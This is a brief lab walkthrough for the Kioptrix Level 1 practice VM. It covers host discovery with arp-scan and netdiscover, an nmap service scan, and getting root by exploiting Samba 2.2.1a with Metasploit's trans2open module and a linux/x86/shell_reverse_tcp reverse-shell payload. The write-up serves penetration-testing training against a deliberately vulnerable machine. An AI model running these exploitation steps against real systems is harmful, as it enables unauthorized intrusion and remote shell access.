Kioptrix: Level 1 Walkthrough
You can download the Kioptrix level 1 virtual machine through this link. You are free to use any hypervisors Oracle’s VirtualBox (I’m using this) or like VMware.
Kioptrix level 1 VM is easy challenge. The object of the challenge is to acquire root access via any means possible (except hacking the VM server). The purpose of these challenge is to learn the basic cybersecurity tools and techniques in Vulnerability Assessment and Penetration Testing, VAPT.
Methodology
- Network Discovery
- Services Scanning and Enumeration
- Exploitation
- Gaining root access
Tools
- arp-scan
- Netdiscover
- Nmap
- Metasploit
Step 1: Network Discovery: You can use arp-scan or netdiscover.
sudo arp-scan -l
sudo netdiscover -r 192.168.1.0/24Target IP (kioptrix VM) is 192.168.1.104. (Your own ip will be different)
Step 2: Active scanning and Enumeration
nmap -A -p- -T4 192.168.1.104
Open ports on the machine with services and versions: 22(ssh), 80(http), 139(smb), and 443(https).
We can use any of these services/ports for the exploitation. Let’s quickly check the web page of the machine.
Search samba 2.2.1a exploit
Go back to Metasploit and search for trans2open for the exploitation.
Meterpreter session 4 closed. Reason: Died!!!!
To solve this problem, I changed the payload (staged payload) to Non-staged payload.
Type this commands/syntax, set payload linux/x86 and press tab key on your keyboard two times. Then it will display payloads for you. Look for non-staged payload and complete the syntax.
set payload linux/x86/shell_reverse_tcp
That’s it for this challenge!
This can be done in numerous ways, this is one of them.
HappyHacking!!! 🐱💻🙌
